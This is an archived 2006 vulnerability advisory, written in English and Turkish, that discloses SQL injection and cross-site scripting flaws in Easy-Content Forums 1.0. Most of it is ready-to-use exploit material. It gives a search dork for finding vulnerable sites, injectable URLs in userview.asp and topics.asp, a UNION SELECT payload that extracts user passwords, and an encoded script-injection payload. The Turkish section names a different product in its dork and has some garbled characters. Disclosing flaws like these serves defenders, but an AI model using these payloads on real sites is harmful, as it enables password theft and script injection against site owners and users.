Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities

2006-05-27T00:00:00
ID SECURITYVULNS:DOC:12840
Type securityvulns
Reporter Securityvulns
Modified 2006-05-27T00:00:00

Description

ENGLISH

Title : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities

Dork : "Copyright 2004 easy-content forums"

Author : ajann

Exploit;

SQL INJECTİON--------------------------------------------------------

http://[target]/[path]/userview.asp?startletter=SQL TEXT

http://[target]/[path]/topics.asp?catid=1'SQL TEXT =>catid=x

Example:

http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

http://[target]/[path]/userview.asp?startletter=xss TEXT

http://[target]/[path]/topics.asp?catid=30&forumname=XSS TEXT

Example:

http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E == X

ajann,Turkey

TURKISH

Başlık : Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities

Sцzcьk[Arama] : "powered by phpmydirectory"

Aзığı Bulan : ajann

Aзık bulunan dosyalar;

SQL INJECTİON--------------------------------------------------------

http://[target]/[path]/userview.asp?startletter=SQL SORGUNUZ

http://[target]/[path]/topics.asp?catid=1'SQL SORGUNUZ =>catid=Değişken

Цrnek:

http://[target]/[path]/topics.asp?catid=1 union+select+0,password,0,0,0,0,0,0,0,0+from+tbl_forum_users

XSS--------------------------------------------------------

http://[target]/[path]/userview.asp?startletter=XSS KODLARINIZ

http://[target]/[path]/topics.asp?catid=30&forumname=XSS KODLARINIZ

Цrnek:

http://[target]/[path]/topics.asp?catid=30&forumname=%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E

%22%3E%3Cscript%3Ealert%28%27X%27%29%3B%3C%2Fscript%3E Ekrana X uyarısı cıkarıcaktır.

Acıklama: userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle sql sorgu calıstırılabilmektedir. userview.asp , topics.asp dosyalarında bulunan filtreleme eksikliği nedeniyle xss kodları calısabilmektedir.

ajann,Turkiye